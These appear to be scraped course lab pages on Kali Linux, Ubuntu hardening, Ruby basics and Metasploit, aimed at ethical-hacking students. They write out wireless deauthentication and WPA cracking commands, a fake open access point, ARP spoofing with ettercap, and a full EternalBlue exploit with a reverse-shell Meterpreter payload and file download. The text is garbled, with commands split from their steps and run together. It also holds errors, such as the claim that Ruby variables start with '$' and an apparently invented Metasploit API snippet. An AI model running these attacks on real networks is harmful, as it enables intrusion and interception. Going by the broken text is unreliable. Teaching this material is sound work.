Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
This lab activity is designed to introduce students to Kali Linux, a popular distribution for penetration testing and ethical hacking. Students will learn to set up a Kali Linux environment, explore common security tools, and perform various cybersecurity exercises with a special focus on wireless network security.
VMware Workstation Player installed on your computer
Kali Linux ISO file downloaded from the official website (https://www.kali.org/get-kali/)
A USB wireless adapter (for wireless security exercises)
Open VMware Workstation Player
Click on "Create a New Virtual Machine"
Choose "Installer disc image file (iso)" and select your Kali Linux ISO
Follow the wizard, allocating at least 50GB of disk space and 4GB of RAM
Start the virtual machine and follow the Kali Linux installation prompts
Choose "Graphical Install" for a user-friendly installation process
Select your language, location, and keyboard layout
Create a user account with a strong password
Log in to your Kali Linux system
Open a terminal (use the terminal icon or press Ctrl+Alt+T)
Update the system with the following commands:
Reboot the system after updates are complete:
Explore the application menu and note the categories of tools available
Open the terminal and practice basic Linux commands:
Open a terminal and use Nmap to scan your local network:
(Replace 192.168.1.0/24 with your local network range)
Perform a more detailed scan on a specific IP (use your VM's IP or a device you own):
Launch Burp Suite from the applications menu
Configure your browser to use Burp Suite as a proxy (usually 127.0.0.1:8080)
Visit a test website (like http://testphp.vulnweb.com) and observe the traffic in Burp Suite
Explore the different tabs in Burp Suite (Proxy, Target, Spider, etc.)
List available network interfaces:
If using a virtual machine, attach your USB wireless adapter
Put your wireless interface into monitor mode:
(Replace wlan0 with your wireless interface name)
Use airodump-ng to capture nearby wireless traffic:
Observe the different networks and clients
Choose a target network (use only networks you own or have permission to test)
Capture traffic for the specific network:
Replace [channel] and [BSSID] with the target network's information
In a new terminal, perform a deauthentication attack:
This sends 10 deauthentication packets to the target network
Observe the effect in the airodump-ng window
If you've captured sufficient data from a WEP network:
Discuss why WEP is insecure and should not be used
Convert the capture to a hashcat-compatible format:
Use hashcat to attempt cracking:
Discuss the importance of strong, unique passwords
Create a fake access point:
Set up DHCP on the fake AP:
Discuss the risks of connecting to unknown Wi-Fi networks
Install create_ap:
Create a Wi-Fi hotspot that automatically responds to probe requests:
Discuss how this technique can be used for man-in-the-middle attacks
Install Kismet:
Run Kismet:
Explore the web interface (usually at http://localhost:2501)
Discuss how Kismet can be used to detect wireless attacks
Discuss best practices for securing wireless networks:
Using WPA3 or WPA2-Enterprise
Implementing strong, unique passwords
Enabling network encryption
Create a file with some sample hashed passwords:
Run John the Ripper on the password file:
Observe the cracking process and results
Install OpenVAS:
Set up OpenVAS:
This may take some time to complete.
Access the OpenVAS web interface (usually at https://localhost:9392)
Create a new target using an IP address you have permission to scan
Create a new task to scan this target
Run the scan and analyze the results
In this comprehensive lab, you've learned how to set up a Kali Linux environment and use various cybersecurity tools. You've performed network reconnaissance, analyzed web application traffic, explored wireless network security in depth, cracked passwords, and conducted vulnerability scanning. These skills form a solid foundation for further exploration of ethical hacking and penetration testing.
Name your virtual machine "Kali-Cybersec-Lab"
Use the entire disk for installation and select "All files in one partition"
Complete the installation and reboot when prompted
Disabling WPS
Regularly updating router firmware
Set up a secure wireless network on a test router (if available)
sudo apt update
sudo apt full-upgrade -ysudo rebootls, cd, pwd, mkdir, rm, cp, mvsudo nmap -sn 192.168.1.0/24sudo nmap -sV -O 192.168.1.Xiwconfigsudo airmon-ng start wlan0sudo airodump-ng wlan0monsudo airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0monsudo aireplay-ng --deauth 10 -a [BSSID] wlan0monaircrack-ng capture*.capaircrack-ng capture*.cap -J outputhashcat -m 2500 output.hccapx /usr/share/wordlists/rockyou.txtsudo airbase-ng -e "Free WiFi" -c 1 wlan0monsudo dhcpd at0sudo apt install create_apsudo create_ap wlan0 eth0 MyPineapplesudo apt install kismetkismetecho "user1:AZl.zWwxIh15Q" > passwords.txt
echo "user2:HX9LLTdc/jiDE" >> passwords.txtjohn passwords.txtsudo apt install openvassudo gvm-setupCreate a Metasploit module that takes a URL as input and checks if the corresponding website is online.
Save the module as check_online.rb in the Metasploit modules/auxiliary/scanner/http directory.
Restart Metasploit to ensure it loads custom modules from ~/.msf4/modules.
Load the Module
Run the Module
##
# This module requires Metasploit
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Check if Website is Online',
'Description' => %q{
This module checks if a target website is online by sending an HTTP GET request.
},
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => []
))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to check if the website is online', '/'])
]
)
end
def run
begin
res = send_request_raw({
'uri' => datastore['TARGETURI'],
'method' => 'GET'
})
if res && res.code == 200
print_good("#{peer} is online.")
else
print_error("#{peer} is offline or unreachable.")
end
rescue ::Rex::ConnectionError
print_error("#{peer} is offline or unreachable.")
end
end
endreload_alluse auxiliary/scanner/http/check_onlineset RHOSTS https://www.wpunj.edu
runVMware Workstation Player installed on your computer
Ubuntu Server 22.04 LTS ISO file downloaded (or the latest LTS version available)
Open VMware Workstation Player
Click on "Create a New Virtual Machine"
Choose "Installer disc image file (iso)" and select your Ubuntu Server ISO
Follow the wizard, allocating at least 20GB of disk space and 2GB of RAM
Start the virtual machine and follow the Ubuntu Server installation prompts
Choose to install Ubuntu Server (minimized installation)
Configure network settings (DHCP is usually fine for this lab)
Set up a username and password for the administrator account
Choose to install OpenSSH server when prompted
Do not select any additional featured server snaps
After installation, log in with your credentials
Update the package list and upgrade installed packages:
Create a new user:
Add the new user to the sudo group:
Switch to the new user:
Create a directory and a file:
Change permissions:
Verify permissions:
Check firewall status:
Enable the firewall:
Allow SSH:
Edit SSH configuration:
Make the following changes:
Change PermitRootLogin to no
Set PasswordAuthentication to no
Set MaxAuthTries to 3
Restart SSH service:
Install Nmap:
Perform a basic scan (replace with a safe, authorized IP):
Install Fail2ban:
Copy the configuration file:
Edit the configuration:
Find the [sshd] section and set enabled = true
Restart Fail2ban:
View the system log:
Search for SSH-related entries:
Use the tail command to monitor logs in real-time:
In another terminal or from another machine, attempt to SSH into the server and observe the log entries
Install Apache:
Allow HTTP traffic through the firewall:
Edit the default web page:
Add some basic HTML content:
Save and exit the editor
From another machine on the network, open a web browser and navigate to the IP address of your Ubuntu Server
In this lab, you've learned how to set up an Ubuntu Server LTS virtual machine, perform basic system administration tasks, configure security settings, install and use common cybersecurity tools, and analyze system logs. You've also optionally set up a basic web server. These skills form a foundation for further exploration of Linux servers in cybersecurity contexts.
This advanced lab activity builds upon the previous Ubuntu 22 Server lab, focusing on more complex ethical hacking techniques targeting Ubuntu Linux systems. Students will explore vulnerable web applications, container escapes, and advanced privilege escalation techniques.
sudo apt update
sudo apt upgrade -ysudo adduser securitystudentsudo usermod -aG sudo securitystudentsu - securitystudentmkdir securefiles
echo "This is a secret" > securefiles/secret.txtchmod 700 securefiles
chmod 600 securefiles/secret.txtls -l securefiles
ls -l securefiles/secret.txtsudo ufw statussudo ufw enablesudo ufw allow sshsudo nano /etc/ssh/sshd_configsudo apt install nmap -ysudo nmap 192.168.1.1sudo apt install fail2ban -ysudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.localsudo nano /etc/fail2ban/jail.localsudo less /var/log/syslogsudo grep sshd /var/log/auth.logsudo tail -f /var/log/auth.logsudo apt install apache2 -ysudo ufw allow 'Apache'sudo nano /var/www/html/index.html<html>
<body>
<h1>Welcome to my secure server!</h1>
</body>
</html>sudo systemctl restart sshsudo systemctl restart fail2banCompleted basic Ubuntu 22 Server lab
VMware Workstation Player with Ubuntu Server 22.04 LTS installed
Basic familiarity with Linux command line and web technologies
This lab is for educational purposes only. Always obtain proper authorization before attempting any hacking techniques on systems you do not own or have explicit permission to test.
SSH into your Ubuntu Server VM
Install necessary packages:
Download and set up DVWA:
Configure DVWA:
Set up the DVWA database:
Access DVWA at http://DVWA and click "Create / Reset Database"
Install Docker:
Pull and run a vulnerable container:
Access DVWA and navigate to the "SQL Injection" page
Try to bypass login using SQL injection
Attempt to extract database information using UNION-based SQL injection
Navigate to the "XSS (Reflected)" page in DVWA
Craft a payload to display an alert box
Create a more complex XSS payload that steals cookies
Explore the "File Inclusion" page in DVWA
Attempt to read sensitive system files using LFI (Local File Inclusion)
If possible, achieve RFI (Remote File Inclusion) to execute remote code
Check the kernel version of your Ubuntu Server:
Research and attempt to find a kernel exploit for this version
Compile and run the exploit to gain root privileges
Find SUID binaries on the system:
Identify a vulnerable SUID binary (you may need to intentionally install one for this exercise)
Exploit the SUID binary to gain root access
View the system-wide crontab:
Identify a writable script that runs as root
Modify the script to add a backdoor or elevate privileges
Install Ettercap:
Perform ARP spoofing between two VMs or containers:
Analyze the intercepted traffic
Install hostapd and dnsmasq:
Configure a rogue access point
Implement a captive portal to capture credentials
Intentionally generate suspicious activities on the server
Analyze logs in /var/log to detect the malicious activities
Create a bash script to automate log analysis and alert on suspicious activities
Install Volatility:
Capture a memory dump of a running process
Analyze the memory dump to find hidden processes or injected code
This advanced lab has provided hands-on experience with complex ethical hacking techniques targeting Ubuntu Linux systems. You've explored web application vulnerabilities, advanced privilege escalation methods, container security, network-level attacks, and basic forensics. Remember to always apply these skills ethically and legally.
sudo apt update
sudo apt install apache2 mysql-server php php-mysqli -ycd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
sudo chown -R www-data:www-data DVWAcd DVWA
sudo cp config/config.inc.php.dist config/config.inc.php
sudo sed -i "s/p@ssw0rd//" config/config.inc.phpsudo apt install docker.io -ysudo docker run -d -p 8080:80 vulnerables/web-dvwauname -asudo find / -perm -4000 2>/dev/nullsudo cat /etc/crontabsudo apt install ettercap-text-only -ysudo ettercap -T -S -i eth0 -M arp:remote /target1_ip/ /target2_ip/sudo apt install hostapd dnsmasq -ysudo apt install volatility -yRuby has a simple syntax that is easy to learn. Here are some basic concepts:
Variables: In Ruby, variables start with a dollar sign ($). For example: $my_variable = "Hello World!"
Strings: Strings are enclosed in quotes or double quotes. For example: "Hello World!" or 'Hello World!'
Numbers: Numbers can be integers or floating-point numbers. For example: 10, 3.14
Operators: Ruby has the usual arithmetic operators (+, -, *, /) as well as comparison operators (==, !=, <, >)
Methods: Methods are blocks of code that can be called multiple times with different inputs. For example: def greet(name); puts "Hello, #{name}!"; end
Control structures determine the flow of your program's execution.
If-else statements: Used to make decisions based on conditions.
Loops: Used to repeat a block of code for a specified number of times.
Case statements: Used to compare an expression with multiple values and execute different blocks of code accordingly.
Arrays and hashes are two fundamental data structures in Ruby.
Arrays: Ordered collections of elements, indexed by integers starting from 0.
Hashes: Unordered collections of key-value pairs.
Methods are reusable blocks of code that take arguments and return values. Blocks are similar to methods but can be defined inline.
Method definition: Define a method using the def keyword.
Block definition: Define a block using the do...end or {} syntax.
Ruby is an object-oriented language that supports encapsulation, inheritance, and polymorphism.
Class definition: Define a class using the class keyword.
Inheritance: Create a new class that inherits from an existing class.
Ruby comes with a comprehensive standard library that includes modules like IO, File, and Socket.
File I/O: Read and write files using the File class.
Networking: Use the Socket class to create network connections.
Ruby has a vast ecosystem of third-party libraries and frameworks, known as gems.
Gems: Install gems using the gem install command.
Bundler: Use Bundler to manage gem dependencies in your project.
Now that you have a solid foundation in Ruby, let's explore how to integrate it with Metasploit!
Metasploit API: Use the Metasploit API to interact with the framework programmatically.
Metasploit Console: Use the Metasploit console to interact with the framework interactively.
sudo mysql -e "CREATE DATABASE dvwa; CREATE USER dvwa@localhost IDENTIFIED BY 'p@ssw0rd'; GRANT ALL ON dvwa.* TO dvwa@localhost; FLUSH PRIVILEGES;"x = 10
if x > 5
puts "x is greater than 5"
else
puts "x is less than or equal to 5"
endi = 0
while i < 5 do
puts "Loop iteration: #{i}"
i += 1
endx = "apple"
case x
when "banana"; puts "You chose banana!"
when "apple"; puts "You chose apple!"
else; puts "Invalid choice!"
endfruits = ["apple", "banana", "orange"]
puts fruits[1] # prints "banana"person = {name: "John Doe", age: 30}
puts person[:age] # prints 30def greet(name)
puts "Hello, #{name}!"
end
greet("Alice") # prints "Hello, Alice!"[1, 2, 3].each do |x|
puts x
end
# equivalent to:
[1, 2, 3].each { |x| puts x }class Car
def initialize(make, model)
@make = make
@model = model
end
def honk
puts "Beep!"
end
end
my_car = Car.new("Toyota", "Corolla")
my_car.honk # prints "Beep!"class ElectricCar < Car
def initialize(make, model)
super(make, model)
@battery_capacity = 100
end
def charge
puts "Charging battery..."
end
end
my_electric_car = ElectricCar.new("Tesla", "Model S")
my_electric_car.honk # prints "Beep!"
my_electric_car.charge # prints "Charging battery..."file = File.open("example.txt", "w")
file.puts "Hello World!"
file.close
# or use the block syntax:
File.open("example.txt", "w") do |file|
file.puts "Hello World!"
endrequire 'socket'
sock = TCPSocket.new('www.example.com', 80)
sock.puts "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
puts sock.read
# or use the block syntax:
TCPSocket.open('www.example.com', 80) do |sock|
sock.puts "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
puts sock.read
endgem install rails# Gemfile:
source 'https://rubygems.org'
gem 'rails', '~> 6.0'
# run:
bundle installrequire 'msf/core'
# create an instance of the Msf::Core class:
core = Msf::Core.new
# load a module:
module = core.modules.load('exploit/multi/handler')
# run the exploit:
core.exploits.run(module)msfconsoleWrite a Ruby script that takes two integers as input, adds them together, and returns the result.
Example Input: ruby script.rb 2 3 Expected Output: 5
Solution Outline:
Define a method add_numbers that takes two integers as input.
Use the '+' operator to add the two numbers together.
Return the result.
Write a Ruby script that takes a string as input and returns the string with all vowels removed.
Example Input: "Hello World" Expected Output: "Hll Wrld"
Solution Outline:
Define a method remove_vowels that takes a string as input.
Use regular expressions to match all vowels (both lowercase and uppercase) in the string.
Replace each vowel with an empty string using the gsub method.
Write a Ruby script that reads a file named "input.txt" and prints its contents to the console.
Assumptions:
The file exists in the same directory as the script.
The file contains only text data.
Solution Outline:
Define a method read_file that takes a file name as input.
Open the file in read-only mode using the File.open method and assign it to a variable.
Read the contents of the file using the read method.
Write a Ruby script that takes an array of integers as input, sorts it in ascending order, and prints the sorted array.
Example Input: [3, 1, 2, 6] Expected Output: [1, 2, 3, 6]
Solution Outline:
Define a method sort_array that takes an array of integers as input.
Use the sort method to sort the array in ascending order.
Return the sorted array.
Write a Ruby script that takes two arrays as input (keys and values) and creates a hash from them. Print the resulting hash.
Example Input: ["name", "age"], ["John", 30] Here is the rest of the combined version:
Problem 5: Hash Creation
Write a Ruby script that takes two arrays as input (keys and values) and creates a hash from them. Print the resulting hash.
Example Input: ["name", "age"], ["John", 30]
Solution Outline:
Define a method create_hash that takes two arrays as input.
Use the zip method to combine the keys and values into an array of arrays.
Use the to_h method to convert the array of arrays into a hash.
Write a Ruby script that takes an IP address as input and returns true if it is valid, and false otherwise.
Example Input: "192.168.1.1" Expected Output: true
Solution Outline:
Define a method is_valid_ip that takes an IP address as input.
Use regular expressions to match the IP address format.
Split the IP address into its four parts and convert each part to an integer.
Check if each part is within the range of 0-255 using the between?
Write a Ruby script that takes a string and a search term as input, and returns the index of the first occurrence of the search term in the string. If the search term is not found, return -1.
Example Input: "Hello World", "World" Expected Output: 6
Solution Outline:
Define a method find_string that takes a string and a search term as input.
Use the index method to find the index of the search term in the string.
If the search term is not found, return -1 using the || operator.
def add_numbers(a, b)
# Use the '+' operator to add the two numbers together
end
a = 2
b = 3
puts add_numbers(a, b)Close the file to free up system resources using the close method.
Return the contents of the file.
Return the resulting hash.
def remove_vowels(input_string)
# Use regular expressions to replace all vowels (both lowercase and uppercase) with an empty string
end
input_string = "Hello World"
puts remove_vowels(input_string)def read_file(file_name)
# Open the file in read-only mode ('r') and assign it to a variable
# Read the contents of the file using the `read` method
# Close the file to free up system resources
# Return the contents of the file
end
file_name = "input.txt"
puts read_file(file_name)def sort_array(input_array)
# Use the `sort` method to sort the array in ascending order
end
input_array = [3, 1, 2, 6]
puts sort_array(input_array).inspectdef create_hash(keys, values)
# Use the `zip` method to combine the keys and values into an array of arrays
# Use the `to_h` method to convert the array of arrays into a hash
end
keys = ["name", "age"]
values = ["John", 30]
puts create_hash(keys, values).inspectdef is_valid_ip(ip_address)
# Use regular expressions to match the IP address format
end
ip_address = "192.168.1.1"
puts is_valid_ip(ip_address)def find_string(search_term, text)
# Use the `index` method to find the index of the search term
end
search_term = "World"
text = "Hello World"
puts find_string(search_term, text)Disclaimer: This tutorial is intended for educational purposes only. Always ensure you have explicit permission to perform penetration testing on any network or system. Unauthorized access to computer systems is illegal and unethical.
Introduction to Metasploit
Setting Up the Environment
Starting Metasploit Framework
Basic Commands in Metasploit
Metasploit Framework is a powerful tool used by cybersecurity professionals for penetration testing and vulnerability assessments. It provides a suite of tools for simulating attacks on networks and systems to identify security weaknesses.
Kali Linux installed on your machine (bare-metal, virtual machine, or live boot).
Basic understanding of networking and command-line interface.
Before starting, ensure your system is up-to-date:
Metasploit comes pre-installed on Kali Linux.
To start the Metasploit console:
Open a terminal window.
Initialize the PostgreSQL database (required for Metasploit):
Start the Metasploit console:
You should see the Metasploit banner and the msf> prompt.
You can also find it by navigating in the Kali Linux menu system.
Familiarize yourself with some basic commands:
help: Displays help menu with a list of commands.
version: Shows the current version of Metasploit.
search: Searches for exploits, payloads, and modules.
Before exploiting, gather information about the target.
Run Nmap scan:
Replace 192.168.1.10 with the target IP address.
View the scanned hosts:
List open services and ports:
Use the search command with relevant keywords:
Choose an exploit module:
View exploit options:
Set the target IP address:
Confirm the options are set:
Show compatible payloads:
Choose a payload (e.g., reverse TCP shell):
Set the local host IP (your machine's IP):
Replace 192.168.1.5 with your Kali Linux IP address.
(Optional) Set the local port:
Run the exploit:
Metasploit will attempt to exploit the target and establish a Meterpreter session.
Once a session is established, you can interact with the target system.
sysinfo: Displays system information.
getuid: Shows user ID.
shell: Drops into a shell on the target system.
exit: Closes the Meterpreter session.
List active sessions:
Interact with a session:
Close a session:
Exit Metasploit:
Legal Authorization: Always obtain written permission before performing any penetration testing.
Ethical Responsibility: Use Metasploit to improve security, not to exploit vulnerabilities for malicious purposes.
Confidentiality: Keep any sensitive data obtained during testing confidential.
Reporting: Provide detailed reports of your findings to the appropriate parties to help remediate vulnerabilities.
Note: Always remember the importance of legality and ethics in cybersecurity work. Use these skills responsibly to contribute to a safer digital environment.
Selecting and Configuring Exploits
Choosing and Configuring Payloads
Executing the Exploit
Post-Exploitation with Meterpreter
Closing the Session and Exiting Metasploit
Best Practices and Ethical Considerations
use: Selects a module to use.
show options: Displays options for the selected module.
screenshot: Takes a screenshot of the target desktop.
download: Downloads a file from the target system.
Continuous Learning: Stay updated with the latest security trends and Metasploit modules.
msf> use exploit/windows/smb/ms17_010_eternalbluemsf> show optionsmeterpreter> screenshotmeterpreter> download C:\\path\\to\\file.txtsudo apt update && sudo apt upgrade -ysudo service postgresql startsudo msfconsolemsf> helpmsf> versionmsf> search smbmsf> db_nmap -sV -O 192.168.1.10msf> hostsmsf> servicesmsf> search type:exploit name:smbmsf> use exploit/windows/smb/ms17_010_eternalbluemsf> show optionsmsf> set RHOSTS 192.168.1.10msf> show optionsmsf> show payloadsmsf> set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf> set LHOST 192.168.1.5msf> set LPORT 4444msf> exploitmeterpreter> sysinfometerpreter> getuidmeterpreter> shellmeterpreter> exitmsf> sessions -lmsf> sessions -i [session_id]msf> sessions -k [session_id]msf> exit